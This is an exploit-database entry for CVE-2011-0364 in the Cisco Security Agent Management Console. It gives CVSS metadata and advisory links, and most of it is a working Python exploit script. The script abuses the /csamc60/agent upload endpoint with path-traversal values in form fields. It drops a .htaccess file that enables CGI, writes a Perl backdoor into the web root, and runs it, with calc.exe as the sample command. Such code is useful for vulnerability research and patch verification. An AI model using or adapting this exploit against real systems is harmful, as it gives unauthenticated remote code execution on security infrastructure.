Cisco Security Agent Management Console

Published
Credit
Risk
2011.04.20
Gerry Eisenhaur
High
CWE
CVE
Local
Remote
NVD-CWE-noinfo
CVE-2011-0364
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
10/10
10/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Complete
Complete
Complete

#!/usr/bin/env python
# Exploits Cisco Security Agent Management Console ��st_upload�� (CVE-2011-0364)
# gerry eisenhaur <gerry.eisenhaur@gmail.com>

import httplib
import mimetools
import StringIO

_boundary = mimetools.choose_boundary()
_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'
_csamc = "192.168.0.108"

# we need to enable some scripting to get command access
htaccess = "Options +Includes +ExecCGI\r\nAddHandler cgi-script gee"
perl_path = "#!c:/program files/cisco/csamc/csamc60/perl/5.8.7/bin/mswin32-x86/perl\r\n",
backdoor = "exec \"calc.exe\";"

def send_request(params=None):
buf = StringIO.StringIO()
headers = {"Content-type": 'multipart/form-data; boundary=%s' % _boundary}

for(key, value) in params.iteritems():
buf.write('--%s\r\n' % _boundary)
buf.write('Content-Disposition: form-data; name="%s"' % key)
buf.write('\r\n\r\n%s\r\n' % value)
buf.write('--' + _boundary + '--\r\n\r\n')
body = buf.getvalue()

conn = httplib.HTTPSConnection(_csamc)
conn.request("POST", "/csamc60/agent", body, headers)
response = conn.getresponse()
print response.status, response.reason
conn.close()

def main():
### Build up required dir tree
dirtree = ["../bin/webserver/htdocs/diag/bin",
"../bin/webserver/htdocs/diag/bin/webserver",
"../bin/webserver/htdocs/diag/bin/webserver/htdocs"]
_params = {
'host_uid': _host_uid,
'jobname': None,
'host': "aa",
'diags': " ",
'diagsu': " ",
'profiler': " ",
'extension': "gee",
}
for path in dirtree:
print "[+] Creating directory: %s" % path
_params['jobname'] = path
send_request(_params)

### Done building path, drop files
print "[+] Dropping .htaccess"
send_request({
'host_uid': _host_uid,
'jobname': '',
'host': "/../bin/webserver/",
'diags': "",
'diagsu': "",
'profiler': htaccess,
'extension': "/../.htaccess",
})

print "[+] Dropping payload"
send_request({
'host_uid': _host_uid,
'jobname': '',
'host': "/../bin/webserver/htdocs/gerry",
'diags': perl_path,
'diagsu': "",
'profiler': backdoor,
'extension': "/../exploit.gee",
})

print "[+] Done, Executing dropped file."
try:
conn = httplib.HTTPSConnection(_csamc, timeout=1)
conn.request("GET", "/csamc60/exploit.gee")
response = conn.getresponse()
print response.status, response.reason
print response.read()
except httplib.ssl.SSLError:
pass
print "[+] Finished."

if __name__ == '__main__':
main()

References:

http://xforce.iss.net/xforce/xfdb/65436
http://www.zerodayinitiative.com/advisories/ZDI-11-088
http://www.vupen.com/english/advisories/2011/0424
http://www.securitytracker.com/id?1025088
http://www.securityfocus.com/bid/46420
http://www.securityfocus.com/archive/1/archive/1/516505/100/0/threaded
http://secunia.com/advisories/43393
http://secunia.com/advisories/43383


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com